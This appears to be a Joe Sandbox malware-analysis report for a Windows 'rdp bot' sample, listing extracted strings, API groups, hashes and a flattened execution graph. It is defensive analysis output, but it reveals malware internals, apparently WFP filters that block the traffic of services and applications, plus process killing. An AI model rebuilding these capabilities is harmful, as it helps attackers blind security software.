                                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                    • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                    • API ID: AttributesErrorFileLast
                                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                    • API ID: strlen
                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                    • API ID: Heap$Processstrlen$AllocFree
                                    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                    • API ID: AttributesFile$ErrorLast
                                    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                    • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                    • API ID: ErrorFileLastModuleName
                                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                    • API ID: ErrorFileLast$CloseCreateHandleSize
                                    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                    • API ID: ErrorLastObjectSingleWait
                                    • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                    • API String ID: 1211598281-4195011794
                                    • Opcode ID: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                    • Instruction ID: fb191ab6f2fabcaa39f7ed12bce9a80337eedf295fa18bdf24171c881faa8a16
                                    • Opcode Fuzzy Hash: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                    • Instruction Fuzzy Hash: D3310E10E8C20392FAE07756A4947789A909F44304EE49233C65FE62F29D7DFD87A273
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastTime
                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    Similarity
                                    • API ID: Virtual$ErrorLastProtectQuery
                                    • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                    Similarity
                                    • API ID: strlen
                                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                    Similarity
                                    • API ID: strlen$strcat
                                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                    Similarity
                                    • API ID: fwprintf$strlen
                                    • String ID: %*.*S$%-*.*S$%.*S
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProc
                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                    • API String ID: 1533789296-1853374401
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                    • API String ID: 2962429428-1801624891
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: DeviceErrorLastQuery
                                    • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                    • API String ID: 963133057-3473575966
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fwprintf
                                    • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                    • API String ID: 968622242-2451587232
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CriticalDeleteSectionfclose
                                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                    • API String ID: 3387974148-4247581856
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,00007FF7E3CFA1E8,00000000,?,?,?,00007FF7E3CFA1E0,00007FF7E3CE1208,?,?,?,00007FF7E3CE1313), ref: 00007FF7E3CEABC2
                                    Strings
                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7E3CEAB5D
                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7E3CEAA62
                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF7E3CEAAEB
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                    • API String ID: 544645111-1286557213
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ErrorHandleLastModule
                                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                    • API String ID: 4242514867-2427012484
                                    APIs
                                    Similarity
                                    • API ID: Byte$CharMultiWide$Lead_errno
                                    • String ID:
                                    • API String ID: 2766522060-0
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: signal
                                    • String ID: CCG
                                    • API String ID: 1946981877-1584390748
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-3474627141
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2187435201
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4273532761
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4283191376
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4064033741
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2713391170
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2468659920
                                    • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                    • Instruction ID: 60d275cb8a7aeec0e7ce933da763dc2b146a509489dd3244f7af712ea826125e
                                    • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                    • Instruction Fuzzy Hash: 6DF01966808F8482D2119F18E4002ABB7B0FF9E789F615327EFC82A664DF3DD5528B00
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1546689137.00007FF70BD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF70BD10000, based on PE: true
                                    • Associated: 00000012.00000002.1546657188.00007FF70BD10000.00000002.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1546713788.00007FF70BD20000.00000004.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1546713788.00007FF70C31C000.00000004.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1550262942.00007FF70C72E000.00000002.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1550288396.00007FF70C736000.00000004.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1550288396.00007FF70C738000.00000004.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1550330294.00007FF70C739000.00000008.00000001.01000000.00000007.sdmp
                                    • Associated: 00000012.00000002.1550351839.00007FF70C73C000.00000002.00000001.01000000.00000007.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff70bd10000_yhar2he6rpt6n0h1w6rh.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                    • Instruction ID: cd1beba6171c46b160d8f1b6ab330e886e55fe349c11fb280a897590ed2d8214
                                    • Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                    • Instruction Fuzzy Hash: 1FB09220A18A4188E2043F169C41258A6206F48710F801430C50C12362CB6C50814B20

                                    Execution Graph

                                    Execution Coverage:6.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.2%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:38
7ffb22707368 memcpy GetProcessHeap HeapFree 60142->60146 60147 7ffb227073a1 60142->60147 60143 7ffb22706ded wcsncpy 60164 7ffb227093ef 60143->60164 60150 7ffb227040d2 6 API calls 60144->60150 60146->60147 60149->60141 60150->60145 60152 7ffb22706ebe GetLastError 60155 7ffb22706ee1 LocalAlloc 60152->60155 60152->60156 60153 7ffb22706e75 GetLastError 60159 7ffb227040d2 6 API calls 60153->60159 60154 7ffb22707070 ConvertSidToStringSidA 60154->60156 60157 7ffb227070c1 GetLastError 60154->60157 60155->60156 60158 7ffb22706eff LookupAccountNameW 60155->60158 60156->60123 60156->60125 60156->60127 60156->60128 60156->60135 60156->60143 60156->60153 60156->60154 60160 7ffb22706f33 LocalFree 60156->60160 60162 7ffb227040d2 6 API calls 60157->60162 60158->60160 60161 7ffb22706f41 GetLastError 60158->60161 60159->60156 60160->60156 60163 7ffb227040d2 6 API calls 60161->60163 60162->60156 60163->60156 60165 7ffb22709417 wcslen 60164->60165 60166 7ffb22706e17 LookupAccountNameW 60164->60166 60165->60166 60166->60152 60166->60156 60167 7ffb23ab3937 60180 7ffb23ab3941 60167->60180 60168 7ffb23ab39da EnterCriticalSection 60168->60180 60169 7ffb23ab3a27 EnterCriticalSection 60175 7ffb23ab3a34 60169->60175 60170 7ffb23ab3a8f LeaveCriticalSection 60171 7ffb23ab3a40 WaitForSingleObject 60183 7ffb23ab2785 10 API calls 60171->60183 60172 7ffb23ab3967 LeaveCriticalSection 60174 7ffb23ab3a1a Sleep SleepEx 60172->60174 60172->60180 60174->60169 60175->60170 60175->60171 60177 7ffb23ab3a76 GetProcessHeap HeapFree 60175->60177 60176 7ffb23ab2072 6 API calls 60178 7ffb23ab3994 WaitForSingleObject 60176->60178 60177->60175 60182 7ffb23ab2785 10 API calls 60178->60182 60180->60168 60180->60169 60180->60172 60180->60176 60181 7ffb23ab39b9 GetProcessHeap HeapFree 60180->60181 60181->60180 60182->60180 60183->60175 60184 7ff7aabd12fd 60187 7ff7aabd1131 60184->60187 60188 7ff7aabd115a 60187->60188 60189 7ff7aabd1172 60188->60189 60190 7ff7aabd1169 Sleep 60188->60190 60191 7ff7aabd1194 60189->60191 
60192 7ff7aabd1188 _amsg_exit 60189->60192 60190->60188 60193 7ff7aabd11b5 60191->60193 60194 7ff7aabd119a _initterm 60191->60194 60192->60193 60195 7ff7aabd11c5 _initterm 60193->60195 60196 7ff7aabd11de 60193->60196 60194->60193 60195->60196 60208 7ff7aabda1bb 60196->60208 60199 7ff7aabd122e 60200 7ff7aabd1233 malloc 60199->60200 60201 7ff7aabd1253 60200->60201 60202 7ff7aabd1283 60201->60202 60203 7ff7aabd1258 strlen malloc 60201->60203 60219 7ff7aabd1fa9 60202->60219 60203->60201 60205 7ff7aabd12c4 60206 7ff7aabd12e3 _cexit 60205->60206 60207 7ff7aabd12e8 60205->60207 60206->60207 60209 7ff7aabd1208 SetUnhandledExceptionFilter 60208->60209 60211 7ff7aabda1d9 60208->60211 60209->60199 60210 7ff7aabda3df 60210->60209 60213 7ff7aabda407 VirtualProtect 60210->60213 60211->60210 60212 7ff7aabda250 60211->60212 60217 7ff7aabda28f 60211->60217 60212->60210 60215 7ff7aabda26e 60212->60215 60213->60210 60215->60212 60223 7ff7aabda074 VirtualQuery VirtualProtect GetLastError 60215->60223 60216 7ff7aabda2fa 60224 7ff7aabda074 VirtualQuery VirtualProtect GetLastError 60216->60224 60217->60210 60217->60216 60220 7ff7aabd1fb9 60219->60220 60225 7ff7aabd1dbc 60220->60225 60223->60215 60224->60217 60226 7ff7aabd1dc6 strcmp 60225->60226 60228 7ff7aabd1e40 60226->60228 60229 7ff7aabd1ddd strcmp 60226->60229 60246 7ff7aabd161a 60228->60246 60230 7ff7aabd1df4 StartServiceCtrlDispatcherA 60229->60230 60231 7ff7aabd1f81 60229->60231 60234 7ff7aabd1e98 GetLastError 60230->60234 60238 7ff7aabd1e2d 60230->60238 60233 7ff7aabd2ef2 6 API calls 60231->60233 60233->60238 60312 7ff7aabd2ef2 60234->60312 60236 7ff7aabd1e4b 60265 7ff7aabd1a63 10 API calls 60236->60265 60238->60205 60241 7ff7aabd1e50 60266 7ff7aabd1b1c 13 API calls 60241->60266 60243 7ff7aabd1e69 _read 60243->60236 60244 7ff7aabd1e5f 60243->60244 60244->60236 60244->60243 60303 7ff7aabd19e2 60244->60303 60323 7ff7aabd1fd0 GetModuleHandleExA 60246->60323 60252 7ff7aabd1650 60252->60236 60267 7ff7aabd16e3 60252->60267 60253 
7ff7aabd164c 60253->60252 60385 7ff7aabd28fc 60253->60385 60260 7ff7aabd1fd0 8 API calls 60261 7ff7aabd16b0 60260->60261 60262 7ff7aabd7689 12 API calls 60261->60262 60263 7ff7aabd16c9 60262->60263 60263->60252 60437 7ff7aabd3452 60263->60437 60265->60241 60266->60238 60268 7ff7aabd1fd0 8 API calls 60267->60268 60269 7ff7aabd172e 60268->60269 60270 7ff7aabd758b 8 API calls 60269->60270 60271 7ff7aabd1743 60270->60271 60272 7ff7aabd174d strlen 60271->60272 60281 7ff7aabd1942 60271->60281 60273 7ff7aabd1783 _mbscpy strlen strlen 60272->60273 60274 7ff7aabd176a 60272->60274 60280 7ff7aabd17ca 60273->60280 60274->60273 60276 7ff7aabd176f strlen 60274->60276 60275 7ff7aabd197a 60275->60244 60276->60273 60277 7ff7aabd1938 60843 7ff7aabd4788 FindClose 60277->60843 60279 7ff7aabd47a3 12 API calls 60279->60280 60280->60277 60280->60279 60283 7ff7aabd2304 8 API calls 60280->60283 60287 7ff7aabd1895 60280->60287 60288 7ff7aabd17ee FreeLibrary 60280->60288 60290 7ff7aabd2283 8 API calls 60280->60290 60842 7ff7aabd1360 SetServiceStatus 60280->60842 60281->60275 60282 7ff7aabd1959 60281->60282 60284 7ff7aabd2ef2 6 API calls 60281->60284 60755 7ffb22761b80 60281->60755 60768 7ffb227054b0 60281->60768 60783 7ffb23ab90d0 60281->60783 60794 7ffb23b08a60 60281->60794 60812 7ffb2273ff40 60281->60812 60829 7ffb23ad1290 60281->60829 60844 7ff7aabd1360 SetServiceStatus 60281->60844 60285 7ff7aabd2ef2 6 API calls 60282->60285 60283->60280 60284->60281 60285->60275 60289 7ff7aabd2ef2 6 API calls 60287->60289 60288->60280 60291 7ff7aabd18ad GetProcessHeap HeapAlloc 60289->60291 60290->60280 60293 7ff7aabd18cf _mbscpy 60291->60293 60294 7ff7aabd18f6 60291->60294 60293->60294 60296 7ff7aabd191b 60293->60296 60295 7ff7aabd2ef2 6 API calls 60294->60295 60295->60296 60296->60277 60296->60296 60304 7ff7aabd1fd0 8 API calls 60303->60304 60305 7ff7aabd1a11 60304->60305 60306 7ff7aabd758b 8 API calls 60305->60306 60307 7ff7aabd1a23 60306->60307 60308 7ff7aabd13cd 20 API calls 60307->60308 60310 
7ff7aabd1a29 60307->60310 60309 7ff7aabd1a3f 60308->60309 60309->60310 60311 7ff7aabd1a4c SleepEx 60309->60311 60310->60244 60311->60310 60313 7ff7aabd2f00 60312->60313 62234 7ff7aabdaa60 60313->62234 60316 7ff7aabd2fbc EnterCriticalSection 60318 7ff7aabd2fd6 LeaveCriticalSection 60316->60318 60320 7ff7aabd2ff3 60316->60320 60317 7ff7aabd2f87 fwrite fflush 60319 7ff7aabd2fb0 60317->60319 60318->60317 60319->60238 60321 7ff7aabd302d CopyFileA 60320->60321 60322 7ff7aabd3065 60321->60322 60322->60318 60324 7ff7aabd2002 GetLastError 60323->60324 60325 7ff7aabd162f 60323->60325 60326 7ff7aabd2ef2 6 API calls 60324->60326 60327 7ff7aabd7689 60325->60327 60326->60325 60328 7ff7aabd76cf 60327->60328 60329 7ff7aabd769f 60327->60329 60331 7ff7aabd2ef2 6 API calls 60328->60331 60460 7ff7aabd758b 60329->60460 60336 7ff7aabd1648 60331->60336 60333 7ff7aabd76ff strlen 60334 7ff7aabd7711 60333->60334 60335 7ff7aabd7727 _mbscat strlen 60333->60335 60334->60335 60337 7ff7aabd7716 strlen 60334->60337 60335->60336 60336->60253 60338 7ff7aabd685f 60336->60338 60337->60335 60339 7ff7aabd6876 60338->60339 60340 7ff7aabd6962 60338->60340 60342 7ff7aabd687f CreateFileA 60339->60342 60343 7ff7aabd6992 60339->60343 60341 7ff7aabd2ef2 6 API calls 60340->60341 60344 7ff7aabd6917 60341->60344 60346 7ff7aabd69c5 GetLastError 60342->60346 60347 7ff7aabd68ca LockFileEx 60342->60347 60345 7ff7aabd2ef2 6 API calls 60343->60345 60353 7ff7aabd6941 60344->60353 60354 7ff7aabd6c29 60344->60354 60345->60344 60348 7ff7aabd2ef2 6 API calls 60346->60348 60349 7ff7aabd68fe 60347->60349 60350 7ff7aabd6aaa GetLastError 60347->60350 60358 7ff7aabd69e6 60348->60358 60349->60344 60352 7ff7aabd6c1b CloseHandle 60349->60352 60351 7ff7aabd2ef2 6 API calls 60350->60351 60360 7ff7aabd6acb 60351->60360 60352->60354 60355 7ff7aabd2ef2 6 API calls 60353->60355 60356 7ff7aabd2ef2 6 API calls 60354->60356 60357 7ff7aabd1669 60355->60357 60356->60357 60357->60252 60361 7ff7aabd309c InitializeCriticalSectionAndSpinCount 
60357->60361 60358->60350 60359 7ff7aabd6b53 60358->60359 60359->60352 60360->60359 60362 7ff7aabd31ed GetLastError 60361->60362 60363 7ff7aabd30ca 60361->60363 60365 7ff7aabd2ef2 6 API calls 60362->60365 60364 7ff7aabd1fd0 8 API calls 60363->60364 60366 7ff7aabd30e6 60364->60366 60373 7ff7aabd31c6 60365->60373 60367 7ff7aabd758b 8 API calls 60366->60367 60368 7ff7aabd30fa 60367->60368 60369 7ff7aabd3104 strlen 60368->60369 60368->60373 60371 7ff7aabd3133 60369->60371 60372 7ff7aabd311d 60369->60372 60370 7ff7aabd2ef2 6 API calls 60374 7ff7aabd31e3 60370->60374 60376 7ff7aabd3158 strlen fopen 60371->60376 60377 7ff7aabd3138 _mbscat strlen 60371->60377 60372->60371 60375 7ff7aabd3122 strlen 60372->60375 60373->60370 60374->60253 60375->60371 60378 7ff7aabd31a4 60376->60378 60379 7ff7aabd32ba 60376->60379 60377->60376 60380 7ff7aabd2ef2 6 API calls 60378->60380 60381 7ff7aabd2ef2 6 API calls 60379->60381 60382 7ff7aabd31be 60380->60382 60381->60373 60382->60373 60383 7ff7aabd332a 60382->60383 60384 7ff7aabd2ef2 6 API calls 60383->60384 60384->60374 60474 7ff7aabd2304 60385->60474 60389 7ff7aabd2963 FreeLibrary 60392 7ff7aabd29c3 GetNativeSystemInfo GetWindowsDirectoryA 60389->60392 60412 7ff7aabd2999 60389->60412 60391 7ff7aabd2ef2 6 API calls 60393 7ff7aabd167e 60391->60393 60395 7ff7aabd2ae0 60392->60395 60396 7ff7aabd2a02 GetLastError 60392->60396 60393->60252 60420 7ff7aabd14ef 60393->60420 60399 7ff7aabd2ef2 6 API calls 60395->60399 60398 7ff7aabd2ef2 6 API calls 60396->60398 60397 7ff7aabd2ef2 6 API calls 60397->60389 60398->60412 60400 7ff7aabd2b01 60399->60400 60400->60412 60490 7ff7aabd9242 60400->60490 60408 7ff7aabd2b3d 60408->60412 60412->60391 60421 7ff7aabd1fd0 8 API calls 60420->60421 60422 7ff7aabd1534 60421->60422 60423 7ff7aabd758b 8 API calls 60422->60423 60424 7ff7aabd1546 60423->60424 60425 7ff7aabd1576 60424->60425 60426 7ff7aabd154c _mbscpy 60424->60426 60427 7ff7aabd2ef2 6 API calls 60425->60427 60517 7ff7aabd13cd strlen 60426->60517 60429 
